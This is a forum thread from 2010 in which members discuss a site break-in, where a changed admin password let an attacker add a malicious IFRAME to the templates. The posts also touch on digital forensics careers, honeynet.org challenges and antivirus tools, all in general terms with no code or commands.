Some of my colleagues here at Goddard do security forensics as their full-time job. It's not trivial.

slang
2010-Apr-06, 10:18 PM
Some of my colleagues here at Goddard do security forensics as their full-time job. It's not trivial.

I applied for a job doing digital forensics. In addition to what I already knew, I learned a lot doing research to be prepared for a possible interview (that sadly never happened, others had experience with relevant software). I wholeheartedly agree it is most certainly not trivial. A fun website (for those interested, anyway) to spend hours and hours and hours on would be http://www.honeynet.org/ and the challenges there.

crosscountry
2010-Apr-07, 02:14 AM
One of the administrator passwords was stolen. Not really stolen, but changed, so that the hacker could pretend to be an administrator and update the website templates. Installing the IFRAME was the prize, like breaking into a bank to steal money. Once the IFRAME was on the site, it could be used to install Trojan viruses on visitors to BAUT who are using old, insecure computers and browsers.

Is this at all related to someone using a name just like an admin? ToSeek posted something about that a short while back.

J Riff
2010-Apr-07, 10:38 PM
I was in and out a few times during this, and no problems at all. I had just run a fully updated version of spybot, tho I have no idea if that's why I didn't notice anything untoward.

HenrikOlsen
2010-Apr-08, 09:02 AM
I was in and out a few times during this, and no problems at all. I had just run a fully updated version of spybot, tho I have no idea if that's why I didn't notice anything untoward.
Because Spybot isn't the relevant program to notice what happened, it's very unlikely to have had any effect.
Which antivirus program do you use?